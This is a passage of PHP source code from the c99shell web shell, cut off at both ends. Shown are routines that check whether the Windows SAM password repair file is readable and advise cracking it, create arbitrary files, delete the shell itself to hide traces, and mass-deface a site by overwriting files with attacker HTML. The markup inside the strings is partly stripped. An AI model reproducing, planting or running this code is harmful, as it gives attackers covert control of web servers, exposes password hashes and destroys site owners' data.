    ";} } else { $v = $_SERVER["WINDIR"]."repairsam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} else {echo "You can crack winnt passwords. Download, and use lcp.crack+.
    ";} } } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) {echo "Make File "".htmlspecialchars($mkfile)."": object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "Make File "".htmlspecialchars($mkfile)."": access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} } else {$act = $dspact = "ls";} } if ($act == "fsbuff") { $arr_copy = $sess_data["copy"]; $arr_cut = $sess_data["cut"]; $arr = array_merge($arr_copy,$arr_cut); if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} else { echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls"; } } if ($act == "selfremove") { if (!empty($submit)) { if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; } else {echo "
    Can't delete ".__FILE__."!
    ";} } else { $v = array(); for($i=0;$i<8;$i++) {$v[] = "NO";} $v[] = "YES"; shuffle($v); $v = join("   ",$v); echo "Self-remove: ".__FILE__."
    Are you sure?
    ".$v."
    "; } } if ($act == "massdeface") { if (empty($deface_in)) {$deface_in = $d;} if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $text = $deface_text; $text_regexp = $deface_text_regexp; if (empty($text)) {$text = " "; $text_regexp = 1;} $a = array ( "name"=>$deface_name, "name_regexp"=>$deface_name_regexp, "text"=>$text, "text_regexp"=>$text_regxp, "text_wwo"=>$deface_text_wwo, "text_cs"=>$deface_text_cs, "text_not"=>$deface_text_not ); $defacetime = getmicrotime(); $in = array_unique(explode(";",$deface_in)); foreach($in as $v) {c99fsearch($v);} $defacetime = round(getmicrotime()-$defacetime,4); if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = true; $act = $dspact = "ls"; } } else { if (empty($deface_preview)) {$deface_preview = 1;} if (empty($deface_html)) {$deface_html = "

    Mass-defaced with c99shell v. ".$shver.", coded by tristram[CCTeaM].";} } echo "
    "; if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

    ";} echo " Deface for (file/directory name):   - regexp
    Deface in (explode ";"):

    Search text:


    - regexp    - whole words only    - case sensitive    - find files NOT containing the text
    - PREVIEW AFFECTED FILES

    Html of deface:


    "; if ($act == "ls") {echo "
    Deface took ".$defacetime." secs

    ";} } if ($act == "search") { if (empty($search_in))